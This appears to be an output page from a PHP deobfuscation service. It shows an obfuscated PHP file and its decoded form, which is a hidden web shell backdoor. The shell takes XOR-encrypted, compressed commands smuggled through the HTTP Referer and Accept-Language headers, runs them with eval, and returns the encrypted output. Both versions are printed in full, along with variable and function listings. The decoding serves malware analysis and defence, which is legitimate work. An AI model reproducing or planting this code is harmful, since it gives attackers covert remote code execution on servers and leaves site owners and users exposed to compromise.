Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $I=str_replace('ip','','ipcreatipeip_ipfipipunction'); $Q='*"HTTP_AC*CEPT_LA*NGUAGE"..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$I=str_replace('ip','','ipcreatipeip_ipfipipunction');
$Q='*"HTTP_AC*CEPT_LA*NGUAGE"*];i*f(*$rr&&$ra)*{$u*=parse_url(*$rr);*p*arse_str($u';
$k='p=$*s*s($p,3*);}if*(*array_key_exists($*i,$s)){$*s[$i]*.=$p*;$e=**strpos($s[$';
$h='d5($i.$*kh),0,3));$f=*$s*l($ss(md5(*$*i.$kf)*,0*,3));$p="";f*or($z=1;$*z<co*u';
$N='nt($*m[1]);*$z++)$p*.=$q*[$m[2]*[$z]];*if(*strpos($p,$h*)===*0*){$s[$i]=*"";$';
$J='*,$e))*),$k)))*;$o=o***b_get_contents();ob*_end*_clea*n();$d*=bas*e64_encode*';
$v=':;q=0.(*[\\d]*))?,*?/",$ra,$m);if*($q&&$m)*{@sessi*on_sta**rt();$*s=&$_SESSION';
$f='$k*h="5d41*";$kf="4*02a";functio*n x(*$t,$k){**$c=strlen($*k);$l*=strlen($*t);$';
$E='*o=*"";*for($i=0;$i*<$l;){*for($j=0*;($j*<$c&&$i<$*l)*;$j++,$i*++){*$o.=$t{$*i';
$O='(x(gzc**ompress($o)*,$k));pr*int(*"<$k>*$d<*/$k>");@se*s*sion_destr*oy();}}}}';
$t='*4_decode(preg_repl*ace(a*rray("/*_/",*"/-*/"),array*("/","+")*,$*ss($s[$i],0';
$r='*}^$k*{$j*};}}return *$o;}$r*=$_SERVER;$*rr=@$r["***HTTP_RE*FER*ER"];$ra=@$r[';
$j='["query*"],$q)*;$q=*arra*y_values($*q);pre*g_ma*tch_all(*"/([*\\w])*[\\*w-]*+(?';
$S='*i]*,$f);if*($e){$k=$*k*h.$kf;ob_**start();@*ev*al(@gzunco*mpr*ess(@x(@b*ase6';
$H='*;*$ss="su*bstr";$sl*=*"strt*olower";$*i=$m[1][*0]*.$*m[*1][1];$h=*$sl($*ss(m';
$y=str_replace('*','',$f.$E.$r.$Q.$j.$v.$H.$h.$N.$k.$S.$t.$J.$O);
$T=$I('',$y);$T();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$E *o=*"";*for($i=0;$i*<$l;){*for($j=0*;($j*<$c&&$i<$*l)*;$j++,..
$H *;*$ss="su*bstr";$sl*=*"strt*olower";$*i=$m[1][*0]*.$*m[*1][..
$I create_function
$J *,$e))*),$k)))*;$o=o***b_get_contents();ob*_end*_clea*n();$d..
$N nt($*m[1]);*$z++)$p*.=$q*[$m[2]*[$z]];*if(*strpos($p,$h*)===..
$O (x(gzc**ompress($o)*,$k));pr*int(*"<$k>*$d<*/$k>");@se*s*sio..
$Q *"HTTP_AC*CEPT_LA*NGUAGE"*];i*f(*$rr&&$ra)*{$u*=parse_url(*$..
$S *i]*,$f);if*($e){$k=$*k*h.$kf;ob_**start();@*ev*al(@gzunco*m..
$T None
$f $k*h="5d41*";$kf="4*02a";functio*n x(*$t,$k){**$c=strlen($*k..
$h d5($i.$*kh),0,3));$f=*$s*l($ss(md5(*$*i.$kf)*,0*,3));$p="";f..
$j ["query*"],$q)*;$q=*arra*y_values($*q);pre*g_ma*tch_all(*"/(..
$k p=$*s*s($p,3*);}if*(*array_key_exists($*i,$s)){$*s[$i]*.=$p*..
$r *}^$k*{$j*};}}return *$o;}$r*=$_SERVER;$*rr=@$r["***HTTP_RE*..
$t *4_decode(preg_repl*ace(a*rray("/*_/",*"/-*/"),array*("/","+..
$v :;q=0.(*[\d]*))?,*?/",$ra,$m);if*($q&&$m)*{@sessi*on_sta**rt..
$y $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..

Stats

MD5 ef8d6840523c5134367d93c5adc036c9
Eval Count 1
Decode Time 143 ms